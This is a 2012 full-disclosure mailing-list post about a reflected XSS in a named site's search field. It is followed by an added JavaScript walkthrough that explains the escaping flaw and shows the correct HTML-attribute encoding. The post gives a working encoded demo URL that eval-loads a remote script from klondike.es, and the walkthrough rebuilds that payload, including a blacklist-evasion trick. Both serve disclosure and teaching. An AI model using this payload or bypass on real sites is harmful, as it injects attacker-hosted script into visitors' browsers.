Date: Sat, 21 Apr 2012 05:05:31 +0200
From: klondike <klondike@...cosoft.es>
To: full-disclosure@...ts.grok.org.uk
Subject: XSS parameter injection in the search field of http://chicasdetorbe.com

Hello,
Yesterday I discovered a funny XSS injection on the website
http://chicasdetorbe.com, which is an affiliate site of the popular
website http://www.putalocura.com/

Despite my efforts to contact the site owner, I received silence as an
answer; I suppose because he thought this was either not serious or he
just wanted to ignore me. Thus, after having sent various warnings of
full disclosure, I have decided to publish the whole thing.

The vulnerability:
The vulnerability is quite simple: the contents of the search string are
pasted, escaping characters like ' " and \, inside the value field of the
input. Thus you can insert whichever attributes you want, which allows
for event-based injection as long as you don't use the characters ' " or
\, since they will be escaped with an extra \.

Take into account that even if they tried to detect dangerous strings,
this would be bypassable by adding <>, since those are removed by the
content manager.

The demo (the site is NSFW so be careful):
1. Go to:
http://chicasdetorbe.com/?q=%22+onMouseOver%3Deval%28unescape%28%2F%2573%253d%2564%256f%2563%2575%256d%2565%256e%2574%252e%2563%2572%2565%2561%2574%2565%2545%256c%2565%256d%2565%256e%2574%2528%2527%2573%2563%2572%2569%2570%2574%2527%2529%253b%2573%252e%2573%2572%2563%253d%2527%2568%2574%2574%2570%253a%252f%252f%256b%256c%256f%256e%2564%2569%256b%2565%252e%2565%2573%252f%2564%2565%256d%256f%2574%256f%2572%2562%2565%252e%256a%2573%2527%253b%2564%256f%2563%2575%256d%2565%256e%2574%252e%2567%2565%2574%2545%256c%2565%256d%2565%256e%2574%2573%2542%2579%2554%2561%2567%254e%2561%256d%2565%2528%2527%2568%2565%2561%2564%2527%2529%255b%2530%255d%252e%2561%2570%2570%2565%256e%2564%2543%2568%2569%256c%2564%2528%2573%2529%253b%2F.source%29%29%2F%2F
(You may need to copy and paste the whole link.)
2. Put the mouse over the search bar on the top left.
3. Enjoy! (The text is in Spanish and basically offers links to free porn
and photos of chonis: a social group in Spain.)

klondike
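The escaping behaviour described in the post, as an added example that is not part of klondike's message or of the site's own code. The server-side code is not public, so `addslashes`, `stripAngles` and the blacklist below are assumptions modelled on what the post describes; the loader script and its `eval(unescape(/.../.source))` wrapper are decoded from the demo URL. The example shows why backslash-escaping ' " and \ does not protect an HTML `value="..."` context (a browser does not honour backslashes inside a quoted attribute, so the escaped quote still closes it), why the percent-encoded regex-literal trick needs none of the escaped characters, how splitting a keyword with `<>` evades a blacklist that runs before the brackets are stripped, and what the rendering should have done instead. Run it with node.

```javascript
// Added example, not from the original post.  Functions marked "assumed"
// model the post's description of chicasdetorbe.com; they are not its code.

// Assumed server behaviour 1: PHP addslashes()-style escaping of ' " \.
function addslashes(s) {
  return s.replace(/([\\'"])/g, "\\$1");
}

// Assumed server behaviour 2 (from the post): "<" and ">" are removed by
// the content manager.  A blacklist applied before this removal can be
// bypassed by splitting a keyword with "<>".
function stripAngles(s) {
  return s.replace(/[<>]/g, "");
}

// Assumed (hypothetical) keyword blacklist the site might have tried.
function naiveBlacklist(s) {
  return /onmouseover|onload|script/i.test(s);
}

// Vulnerable pipeline: blacklist, strip <>, addslashes, paste into the
// attribute.  Returns null when the blacklist rejects the input.
function renderVulnerable(q) {
  if (naiveBlacklist(q)) return null;
  return `<input type="text" name="q" value="${addslashes(stripAngles(q))}">`;
}

// Fixed rendering: entity-encode for the HTML attribute context.
function htmlAttrEncode(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

function renderFixed(q) {
  return `<input type="text" name="q" value="${htmlAttrEncode(q)}">`;
}

// Toy attribute parser for one start tag.  Like a browser, it treats a
// backslash inside a quoted value as an ordinary character: only the
// matching quote ends the value.  Keys are lower-cased.
function parseAttrs(tag) {
  const attrs = {};
  const body = tag.replace(/^<[A-Za-z][^\s>]*/, "").replace(/\/?>$/, "");
  const re = /\s+([^\s=>"']+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>"']+)))?/g;
  let m;
  while ((m = re.exec(body)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? "";
  }
  return attrs;
}

// The script-loader carried by the demo URL (decoded from the post).
const LOADER = "s=document.createElement('script');" +
  "s.src='http://klondike.es/demotorbe.js';" +
  "document.getElementsByTagName('head')[0].appendChild(s);";

// %XX-encode every character so the payload contains no ' " or \.
function pctEncodeAll(s) {
  return [...s].map((c) => "%" + c.charCodeAt(0).toString(16).padStart(2, "0")).join("");
}

// Rebuilds the post's payload.  The leading quote closes value="...";
// /.../.source yields the encoded text as a string without quoting it,
// and unescape() turns it back into the script that eval() runs.
// With evadeBlacklist, "onMouse<>Over" defeats the assumed blacklist
// because <> is stripped only afterwards.
function buildPayload(js, evadeBlacklist = false) {
  const handler = evadeBlacklist ? "onMouse<>Over" : "onMouseOver";
  return `" ${handler}=eval(unescape(/${pctEncodeAll(js)}/.source))//`;
}

// Recovers what unescape(/.../.source) would produce from an injected
// handler, without eval'ing anything.
function recoverLoader(handler) {
  const m = /^eval\(unescape\(\/([^\/]*)\/\.source\)\)\/\/$/.exec(handler);
  return m ? decodeURIComponent(m[1]) : null;
}

const payload = buildPayload(LOADER, true);
console.log("vulnerable:", renderVulnerable(payload));
console.log("parsed    :", parseAttrs(renderVulnerable(payload)));
console.log("fixed     :", renderFixed(payload));
```

The parsed output of the vulnerable rendering shows `value` holding only the stray backslash and a new `onmouseover` attribute carrying the decoder, while the fixed rendering keeps the entire query inside `value` as `&quot; onMouse&lt;&gt;Over=...`. The general lesson is that escaping must match the output context: `addslashes` is a string-literal escape for PHP, JavaScript or (historically) SQL, and does nothing for HTML attributes.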